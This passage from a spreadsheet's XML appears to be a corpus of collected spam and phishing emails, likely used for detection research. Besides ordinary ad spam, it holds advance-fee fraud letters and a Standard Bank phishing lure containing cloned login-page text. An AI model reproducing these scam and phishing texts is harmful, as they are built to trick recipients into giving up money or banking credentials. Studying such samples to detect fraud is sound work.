+rb8vBofl57Mp1Tba9xLqWk\n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\nnaL1D7G77eR9lx/sOzR2xu</t>
  </si>
  <si>
    <t>http://www.k1-web.com http://www.k1-web.com http://www.k1-web.com</t>
  </si>
  <si>
    <t>4352</t>
  </si>
  <si>
    <t>To: &lt;zzzz@spamassassin.taint.org&gt;\nFrom: "IQ - Jefferson Pilot" &lt;jp@insiq.us&gt;\nDate: Wed, 11 Sep 2002 18:50:19 -0400</t>
  </si>
  <si>
    <t>Wed, 11 Sep 2002 18:50:19 -0400</t>
  </si>
  <si>
    <t>"IQ - Jefferson Pilot" &lt;jp@insiq.us&gt;</t>
  </si>
  <si>
    <t>Your Gateway to Wealth</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_000_1034F3_01C259AF.CA052980 Content-Type: text/plain; 	charset="Windows-1252" Content-Transfer-Encoding: 7bit  Welcome to Jefferson Pilot's  Gateway to Wealth  As one of the industry's premier producers, you must continually seek qualified cutting edge services.  Financial Profiles	  Concept	Profiles+ Professional is a personal and business analysis tool that analyzes a client's insurance, investment and financial planning goals, to help them see their situation today compared to their objectives. 	  Market	Profiles+ Professional is an ideal tool for true financial planning. It not only provides a thorough analysis, including asset allocation, but it can calculate tax implications in a client's plan. Due to its modular format, it can be used for specific planning needs, as well as more comprehensive planning. 	  Benefits This software not only provides exceptional analysis, but excels in providing simple as well as comprehensive presentation pages. By uncovering multiple needs, producers sell more products.	   Deferral+	  Concept	An internet-based "sales-enabling" service, which allows users to quickly become successful in the deferred compensation (COLI) market. 	  Market	Focus on mid-market businesses. In the area of executive benefits, the mid-market opportunity should be defined by either the number of employees within a company, or more specifically by the number of highly compensated executives within a company.	   Benefits A turnkey program that includes qualification of prospect, marketing and sales support, case design, plan documents and administration. 	  G.I.F.T.	  Concept	Global Insurance Funding Transaction (G.I.F.T.) is a sophisticated premium-financing program that provides an alternative funding mechanism for life products purchased to offset large estate and corporate liabilities. 	  Market	Clients with a high net worth of at least $10 million who have an insurance need and believe their existing portfolio of investments, when left unliquidated, will earn more then they will have to pay on loan interest expenses. 	  Benefits G.I.F.T. offers compelling sales solutions, comprehensive supplemental illustrations and access to a consortium of established banks willing and able to lend in this market. Loans are available in both U.S. dollars and Japanese Yen. 	 Please fill out the form below for more information	  Name:	 	  E-mail:	 	  Phone:	 	  City:	 	 State:	 	 Zip:	 	  Primary Insurance Carrier:	 	  Broker-Dealer:	 	   	  	 	    	If you are currently contracted with any of the  Jefferson Pilot Financial family of companies,  please disregard this ad. We don't want anybody to receive our mailing who does not wish to receive them. This is a professional communication sent to insurance professionals. To be removed from this mailing list, DO NOT REPLY to this message. Instead, go here: [URL]http://www.insuranceiq.com[/URL] Legal Notice   ------=_NextPart_000_1034F3_01C259AF.CA052980 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Your Gateway to Wealth =20    =20              =20              Profiles+=20               Professional is a personal and business analysis tool that = analyzes=20               a client's insurance, investment and financial planning = goals, to=20               help them see their situation today compared to their = objectives.=20                 =20              Profiles+=20               Professional is an ideal tool for true financial planning. = It not=20               only provides a thorough analysis, including asset = allocation, but=20               it can calculate tax implications in a client's plan. Due = to its=20               modular format, it can be used for specific planning = needs, as well=20               as more comprehensive planning.  =20              This=20               software not only provides exceptional analysis, but = excels in providing=20               simple as well as comprehensive presentation pages. By = uncovering=20               multiple needs, producers sell more products. =20              =20              An=20               internet-based "sales-enabling" service, which = allows=20               users to quickly become successful in the deferred = compensation=20               (COLI) market.  =20              =20               Focus on mid-market businesses. In the area of executive = benefits,=20               the mid-market opportunity should be defined by either the = number=20               of employees within a company, or more specifically by the = number=20               of highly compensated executives within a = company. =20              =20               A turnkey program that includes qualification of prospect, = marketing=20               and sales support, case design, plan documents and = administration.=20                =20               Global=20               Insurance Funding Transaction (G.I.F.T.) is a = sophisticated premium-financing=20               program that provides an alternative funding mechanism for = life=20               products purchased to offset large estate and corporate = liabilities.=20                =20              =20               Clients with a high net worth of at least $10 million who = have an=20               insurance need and believe their existing portfolio of = investments,=20               when left unliquidated, will earn more then they will have = to pay=20               on loan interest expenses.  =20              =20               G.I.F.T. offers compelling sales solutions, comprehensive = supplemental=20               illustrations and access to a consortium of established = banks willing=20               and able to lend in this market. Loans are available in = both U.S.=20               dollars and Japanese Yen.  =20             =20                =20                    =20                        =20                           Please fill out the form below for more = information =20                           Name: =20                           E-mail: =20                           Phone: =20                           City: State: Zip: =20                           Primary Insurance = Carrier: =20                           Broker-Dealer: =20                           =20                                =20                              =20              =20                                If you are currently contracted with any of the                  Jefferson Pilot Financial family of companies,                  please disregard this ad.                 We don't want anybody to receive our mailing who does = not wish=20                 to receive them. This is a professional communication = sent to=20                 insurance professionals. To be removed from this mailing = list,=20                 DO NOT REPLY to this message. Instead, go here: [URL]http://www.insuranceiq.com[/URL] out Legal = Notice ------=_NextPart_000_1034F3_01C259AF.CA052980--</t>
  </si>
  <si>
    <t>4346</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: "Wesley Gee" &lt;lhjr55@yahoo.com&gt;\nDate: Wed, 11 Sep 2002 06:12:39 -0500</t>
  </si>
  <si>
    <t>Wed, 11 Sep 2002 06:12:39 -0500</t>
  </si>
  <si>
    <t>"Wesley Gee" &lt;lhjr55@yahoo.com&gt;</t>
  </si>
  <si>
    <t>[ILUG] Do NOT Drop your Life Insurance</t>
  </si>
  <si>
    <t>Dear ilug@linux.ie \n\nLife Partners are life insurance appraisers that appraise all types of life insurance policies, allowing people to access their life insurance cash now rather than later. We help individuals unlock cash from unutilized assets. \nIndividuals usually age 65 or older who find that their health, financial and/or estate planning needs have changed are typical candidates. We have had some candidates advised by financial planners to drop their life insurance policies so they could invest their money in a vehicle that will make them a return now. DO NOT drop your policy as it may be worth CASH to you NOW.\n\nWhy do people sell their policies? \nThe reasons individuals make the decision to sell their life insurance policies are as varied as the people themselves. Some reasons may be to:\n\nPay off debts \nFund long term care insurance cost \nEliminate costly premiums \nTake advantage of other financial opportunities \nMake charitable contributions \nHelp family members \n \n  \nLife Partners Living Solutions \n  \nTraditionally, life insurance provides benefits only after death. With Life Partners, it can provide cash benefits for LIFE! \n  \nLife Partners Objectives \nProvide market appraisal for life insurance policy owners \nProvide bids for qualified policies \nProvide lump sum cash payments to qualified owners \nEliminate costly premium payments  \n\nContact us now for a FREE appraisal of your life insurance policy.  REMEMBER THIS IS A FREE SERVICE AND THERE IS NO COST TO YOU !!\n\n1-866-686-LIFE \n1-866-686-5433  or  e-mail us at llhjr55@yahoo.com with your Name and telephone number and we will have one of our team members contact you ASAP. \n\nIf you would like to be removed please send 'remove' to llhjr55@yahoo.com\n\n\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>4349</t>
  </si>
  <si>
    <t>To: &lt;ilug@linux.ie&gt;\nFrom: susan_kamachi@lycos.com\nDate: Wed, 11 Sep 2002 05:41:45 +0500</t>
  </si>
  <si>
    <t>Wed, 11 Sep 2002 05:41:45 +0500</t>
  </si>
  <si>
    <t>susan_kamachi@lycos.com</t>
  </si>
  <si>
    <t>[ILUG] Want to play poker with other people online.</t>
  </si>
  <si>
    <t>Get your favorite Poker action at [URL]http://www.multiplayerpoker.net[/URL]\n\nPlay against real people from around the world for real money or just\nfor fun.  Access one of the busiest poker rooms online.  We've dealt\nover 8 million hands!  Experience the best poker software available\ntoday featuring world class graphics, true random shuffling algorithms,\nand 24x7 customer service.  We've got a great selection of poker games\nfor you to play such as:\n\nHold'em, Omaha\nOmaha Hi/Lo\n7 Card Stud\n7 Card Stud Hi/Lo\n5 Card Stud\nPoker tournaments\n\nSign up today and start playing with new &amp; old friends...download our free\nsoftware now at [URL]http://www.MultiPlayerPoker.net[/URL]\n\nCurrent Promotion:\n   $50 Deposit Bonus! - 100% bonus!\n   Daily High Hand - $250 Daily.\n   Progressive Bad Beat Jackpot - $2,000.00 minimum with $100.00 added\ndaily.\n   Tournaments - Multiplayer shootouts.\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nwish not to received any further e-mail from us please click\n[URL]http://www.centralremovalservice.com[/URL]\n(C2-ss2)8654wjxY6-658XcLk9936BmrC8-408IWAe1238EocG7-405CvgV8282pIEa7-369wxhf6085uYwv5-l73\n\n\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>4393</t>
  </si>
  <si>
    <t>To: ler@lerctr.org\nFrom: Vip-mail &lt;vip@99-81.com&gt;\nDate: Wed, 11 Sep 2002 03:52:37 +0900</t>
  </si>
  <si>
    <t>Wed, 11 Sep 2002 03:52:37 +0900</t>
  </si>
  <si>
    <t>Vip-mail &lt;vip@99-81.com&gt;</t>
  </si>
  <si>
    <t>ler@lerctr.org</t>
  </si>
  <si>
    <t>=?ISO-2022-JP?B?GyRCTCQ+NUJ6OS05cCIoPF5HLiEqPVAycSQkJE45LT5sGyhC?=</t>
  </si>
  <si>
    <t>&lt;_x001B_$B;v6H _x001B_$B;aL&gt;_x001B_(B:Vip-mail _x001B_$BFMA3$N%a!&lt;%k&lt;:Ni$$$?$7$^$9!#_x001B_(B _x001B_$B:#8e$3$N9-9p$,$4ITMW$JJ}$O$=$N;]$r_x001B_(B stop-vip@e-project-web.com _x001B_$B$^$G$*Aw$j2&lt;$5$$!#_x001B_(B _x001B_$B!y!z!y!z!y!z!y!z!y!z!y!z!y!z!y!z!y!z!y!z!y!z!y!z!y_x001B_(B _x001B_$B"v%j%C%A$J=P2q$$$O_x001B_(BVip-mail_x001B_$B$G"v_x001B_(B Vip-mail_x001B_$B$,%O%$%/%i%9$J=P2q$$$r%W%l%&lt;%s%H!y_x001B_(B _x001B_$B7HBS_x001B_(B3_x001B_$B%-%c%j%"$H_x001B_(BPC_x001B_$BBP1~$N=P2q$$%5%$%H"v_x001B_(B _x001B_$B:#$^$G$N=P2q$$%5%$%H$KK0$-$??M_x001B_(B! _x001B_$B=P2q$$$OM_$7$$$1$I%5%$%H$r;H$&amp;$N$O$HLB$C$F$k?M_x001B_(B! _x001B_$B:#D&gt;$0_x001B_(BVip-mail_x001B_$B$K_x001B_(BGo!!!!! [URL]http://www.vip-jp.net[/URL] _x001B_$B=w@-L5NA$OEv$?$jA0_x001B_(B!? _x001B_$BCK@-$K$O$*;n$7%]%$%s%H_x001B_(B50pt_x001B_$B%W%l%&lt;%s%H!y_x001B_(B _x001B_$B=w@-$O%j%C%A$JCK@-$r_x001B_(BGET_x001B_$B$7$h$&amp;_x001B_(Bo(_x001B_$B!f"`!e_x001B_(B)o _x001B_$BCK@-$O$*;n$7%]%$%s%H5$$KF~$C$?L&lt;$r8+$D$1$h$&amp;_x001B_(B(_x001B_$B"`!c_x001B_(B)b _x001B_$B=P2q$$$r5a$a$k$J$i_x001B_(BVip-mail_x001B_$B$K:#D&gt;$0%"%/%;%9_x001B_(B _x001B_$B"-"-"-"-"-"-"-"-"-"-"-"-"-"-_x001B_(B [URL]http://www.vip-jp.net[/URL] _x001B_$B!y!z!y!z!y!z!y!z!y!z!y!z!y!z!y!z!y!z!y!z!y!z!y!z!y_x001B_(B _x001B_$BFMA3$N%a!&lt;%k&lt;:Ni$$$?$7$^$7$?!#_x001B_(B _x001B_$B:#8e$3$N9-9p$,$4ITMW$JJ}!"G[?.Dd;_$r4uK&gt;$5$l$kJ}$O$=$N;]$r_x001B_(B stop-vip@e-project-web.com _x001B_$B$^$G$*Aw$j2&lt;$5$$_x001B_(B</t>
  </si>
  <si>
    <t>http://www.vip-jp.net http://www.vip-jp.net</t>
  </si>
  <si>
    <t>2587</t>
  </si>
  <si>
    <t>To: nan\nFrom: mathewcolin &lt;mathew.colin@tin.it&gt;\nDate: Wed, 11 Oct 2006 01:36:18 +0100</t>
  </si>
  <si>
    <t>Wed, 11 Oct 2006 01:36:18 +0100</t>
  </si>
  <si>
    <t>mathewcolin &lt;mathew.colin@tin.it&gt;</t>
  </si>
  <si>
    <t>DEAR FRIEND</t>
  </si>
  <si>
    <t>DEAR FRIEND\nAintree liverpool,1.301RD\nUnited Kindom\nAttns.\nTEL+447011133420, FAX+448704783512\nI am Mr.mathew colin taylor, the \nbrother of  charles Taylor,former Liberian President.I wish to contact \nyou for help to safeguard some funds into your account, presently the \nfunds is in the security vault in Europe.  He deposited a huge sum of \nmoney (Â£15.5million Pounds Sterling)  I need a foreigner who has or \ncreate a new account in foreign conutry .your co-operation is important \nto make thia wor fine \n\nRead the story: http://news.amnesty.\norg/index/ENGAFR440092006 [URL]http://news.bbc.co[/URL] \nuk/1/hi/world/africa/4858500.stm . I am presently in London England,\nWhen i hear from you, i will open up a full detailed information.\n\n \nRegards,\nMr,mathew colin .\n\n\n</t>
  </si>
  <si>
    <t>http://news.bbc.co</t>
  </si>
  <si>
    <t>1173</t>
  </si>
  <si>
    <t>To: Recipients &lt;statement@standardbank.co.za&gt;\nFrom: Standard Bank &lt;statement@standardbank.co.za&gt;\nDate: Wed, 11 Mar 2020 02:50:57 -0700</t>
  </si>
  <si>
    <t>Wed, 11 Mar 2020 02:50:57 -0700</t>
  </si>
  <si>
    <t>Standard Bank &lt;statement@standardbank.co.za&gt;</t>
  </si>
  <si>
    <t>Recipients &lt;statement@standardbank.co.za&gt;</t>
  </si>
  <si>
    <t>Standard Bank Account eStatement 2020-03-11</t>
  </si>
  <si>
    <t>Dear Customer   Please find your electronic statement for March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 and we will effect the change within thirty (30) days of receipt of your instruction.    To open your eStatement, you will need Adobe Acrobat software (free to download from adobe.com). Regards,  Standard Bank 	  	    For any queries please  call us on 0861201311 Our lines are open from 8am to 9pm Monday to Friday and 8am to 4pm on weekends  and public holidays.             Copyright Standard Bank. All rights reserved. The Standard Bank of South Africa Limited (Reg. No. 1962/000738/06). Authorised financial services provider. Registered credit provider NCR CP15. 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 For more information about Standard Bank Group Limited see [URL]www.standardbank.co.za[/URL]  Dear Customer Please find your electronic statement for March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and we will effect the change within thirty (30) days of receipt of your instruction.  To open your eStatement, you will need Adobe Acrobat software (free to download from adobe.com).Regards, Standard Bank   For any queries please call us on 0861201311Our lines are open from8am to 9pm Monday to Fridayand 8am to 4pm on weekends and public holidays.  Copyright Standard Bank. All rights reserved.The Standard Bank of South Africa Limited (Reg. No. 1962/000738/06). Authorised financial services provider.Registered credit provider NCR CP15.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For more information about Standard Bank Group Limited see [URL]www.standardbank.co.za[/URL]  ï»¿ Standard Bank Online Banking AutoShare/Tax Free Invest Do you want to link your account to your profile? yes no Sign out                   Hello!                                   We've enhanced the sign in feature on our new, fresh Online Banking site.                 Your password has been successfully changed. Sign in Email address Please enter a valid email address By signing in you agree to the                                           T&amp;C'sLast updated on 5 July 2017                                                                                      Next                                                                                         Two steps to quick &amp; easy sign in:Start by entering your email, then your password.                                            Register for online banking                               Your password has been successfully changed.                                Sign in Email address Please enter a valid email address                                        By signing in you accept the                                         terms and conditionsLast updated on 5 July 2017                                                                                Next                                          By signing in you accept the  terms and conditions Last updated on 5 July 2017                                                                                         Sign in                                            Register for online banking                               Received an online banking for business invitation?                                                              START HERE                                Customer Care 0800 222 050 International +27 10 249 0070 These details donât seem to be right. Please check and try again                         Password Sign-In                                              Sign in                                                 {Curent_Email}                          Password Invalid Password                                 Forgot password?                                                              Sign in                                                                  Cancel                              South Africa 0860 123 000 International +27 11 299 4701 Email us at ibsupport@standardbank.co.za Standard Bank is a licensed                    financial services provider in terms of the Financial Advisory and                    Intermediary Services Act and a registered credit provider in terms of                    the National Credit Act, registration number NCRCP15.                 Loading ‐ please wait a moment Due to account inactivity you will be automatically signed out in  seconds. Continue banking? Continue Sign out</t>
  </si>
  <si>
    <t>www.standardbank.co.za www.standardbank.co.za</t>
  </si>
  <si>
    <t>3195</t>
  </si>
  <si>
    <t>To: nan\nFrom: theresa coleman &lt;mrst5heresa@hotmail.fr&gt;\nDate: Wed, 11 Jul 2007 19:52:49 +0000</t>
  </si>
  <si>
    <t>Wed, 11 Jul 2007 19:52:49 +0000</t>
  </si>
  <si>
    <t>theresa coleman &lt;mrst5heresa@hotmail.fr&gt;</t>
  </si>
  <si>
    <t>From Mrs Theresa Coleman,</t>
  </si>
  <si>
    <t>\n&gt;From Mrs Theresa Coleman,\n \nGreeting to you.\n \nMy name is Mrs Theresa Coleman, 35 years,a citizen of Sierra - Leone , wife of late Fidelix Coleman, who before his death was the person managing the Sierra - Leone goldand diamond corporation( SGDC ).\n \nI hope you are aware of the war which has ravaged my country for the past years now . It was in one of this attacks by the rebels that led to the death of my husband and three of my children , now I am left with only my last son David . \n \nI was terrified of the situation and because of this I escaped with my son David from Sierra - Leone to cote d' Ivoire into a refugee camp but brought along the sum of u.s$12.5 million , in a metallic box and presently in a security company as family valuables . \n \nMy aim of contacting you is to seek for your able assistance as a front in transferring this fund abroad into an  account , then as a business developer , you can help us to invest wisely in areas you deem lucrative and finally obtain a residential permit for us to stay comfortable in your country of abode . \n \nPresently we cannot go back to Sierra- Leone because of the situation there and you know that cote d' Ivoire where we are now is politically unstable; we therefore wish you could help us get out of here before it become worse. \n \nWe are prepared to offer you 10% of the total funds for your able assistance and support and would send you proofs of the funds as soon as we favourably hear from you . \n \nFinally I implore you to treat this transaction with secrecy and confidentiality for security reasons . \n \nThanking you in anticipation and God bless. \nMrs Theresa Coleman.\n_________________________________________________________________\nDécouvrez Windows Live Spaces et créez votre site Web perso en quelques clics !\n[URL]http://spaces.live.com[/URL]</t>
  </si>
  <si>
    <t>589</t>
  </si>
  <si>
    <t>To: icos3@ags.uni-sb.de\nFrom: SIMON OKOH1 &lt;simonokoh1@fsmail.net&gt;\nDate: Wed, 11 Feb 2004 03:38:54 +0100</t>
  </si>
  <si>
    <t>Wed, 11 Feb 2004 03:38:54 +0100</t>
  </si>
  <si>
    <t>SIMON OKOH1 &lt;simonokoh1@fsmail.net&gt;</t>
  </si>
  <si>
    <t>icos3@ags.uni-sb.de</t>
  </si>
  <si>
    <t>safe keeping</t>
  </si>
  <si>
    <t xml:space="preserve"> \nFROM: MR. SIMON OKOH.\nDIRECTOR: KEY TESTED TELEX WIRE TRANSFERS DEPARTMENT,\nCENTRAL BANK OF NIGERIA,\nTINUBU SQUARE- LAGOS.\nTEL: 234-8023139781.\n\nPERSONAL/STRICTLY CONFIDENTIAL\nI am delighted to contact you on a private note based on your claim to your contract fund, which has been programmed for transfer into your designated bank account through my department.\nI am hereby apologizing to you for the delay in releasing this fund into your account, which was caused by me because of breach of agreement between me and your so called partners in Nigeria who introduced you into this business.\nYour Nigeria partners approached me that they want to present you as a beneficiary to this fund as it was an OVER-INVOICING made when they are awarding contract to foreign firms. So after the negotiation, we unanimously agreed that they (your partners) would give me the sum of US$200,000.00(CASH) on my acceptance to assist them to transfer the fund into your account. When I accepted the offer, they forwarded all your banking particulars to me for onward transfer. As soon as I made some fruitful efforts on the business and demanded my US$200,000.00 as agreed, your partners deviated from the agreement and decided to go through the International Remittance Department at my back and made a change of your bank account in other to disappoint me and not knowing that the International Remittance Department is also under my control. Then I got the knowledge of their evil plans and prove their illicit efforts abortive. That is why for many months you have been pursuing this payment, spending unnecessary funds to some fraudulent individuals in Nigeria who claimed to be in charge to release your fund.\nI want to re-emphasize to you that your funds is still with me and under my control. Now with my whole heart, I want to enter into real business with you on a sincere agreement since your partners has disappear into tin-air and nowhere to be found and the fund is still floating in your name waiting for a proper documentation and claims.\n1. On an agreement, I assure you that I am going to transfer this fund into your account.\n2. You will assure me of keeping my dealings with you to an utmost secretary because of my position.\n3. You will promise to give me 20% of the total fund as soon as the fund gets into your account with a written promissory note signed by you.\n4. I will assist you in making a proper documentation to make claims genuine, as a bonafide Foreign Contractor and beneficiary to the said fund.\n5. Reconfirmation of your receiving bank account so as to avoid wrong remittance.\n6. Your private phone and fax numbers, this is important for confidential issues and payment release instructions.\nI am aware that some fraudulent individuals has been impersonating my name and office to contact you and other contractors as reported by the Central Bank of Nigeria authorities. I advise you that henceforth, you should suspend any dealings from any group of person(s) either from the CBN or any other financial institution/parastatals in Nigeria or Overseas that might be contacting you in this purpose and endeavor to keep this information confidential until we finalize this transaction. Please reply this message urgently and call me on my confidential Tel Number: 234-8023139781as soon as you received this fax. While waiting for your favorable response, God bless you.\nYours faithfully,\nMR. SIMON OKOH.\nDIRECTOR KEY TESTED TELEX WIRE TRANSFER DEPT.\nN: B\nSorry, I could not use my official Memo to write you due to the confidentiality of this transaction but will be used in other official communication during the transfer. My Email address and Tel Number is stated here once again:\nTel Number: 234-8023139781. Please call in receipt of this letter.\nE-mail: \nSIMONOKOH@FSMAIL.NET All payments offshore has been recalled back to Apex Bank Head Office for a direct remittance, therefore, you should not be deceived by anybody / Bank out side CBN. Work faster to contacting me immediately as I have already created way for Immediate execution of payment release,    \n    \nFreeserve AnyTime - HALF PRICE for the first 3 months - Save £7.50 a month \n[URL]www.freeserve.com[/URL]</t>
  </si>
  <si>
    <t>1130</t>
  </si>
  <si>
    <t>To: jose@monkey.org\nFrom: "WeTransfer" &lt;wt@hamnc.com&gt;\nDate: Wed, 11 Dec 2019 01:18:49 -0800</t>
  </si>
  <si>
    <t>Wed, 11 Dec 2019 01:18:49 -0800</t>
  </si>
  <si>
    <t>"WeTransfer" &lt;wt@hamnc.com&gt;</t>
  </si>
  <si>
    <t>Your files where successfully sent via WeTransfer</t>
  </si>
  <si>
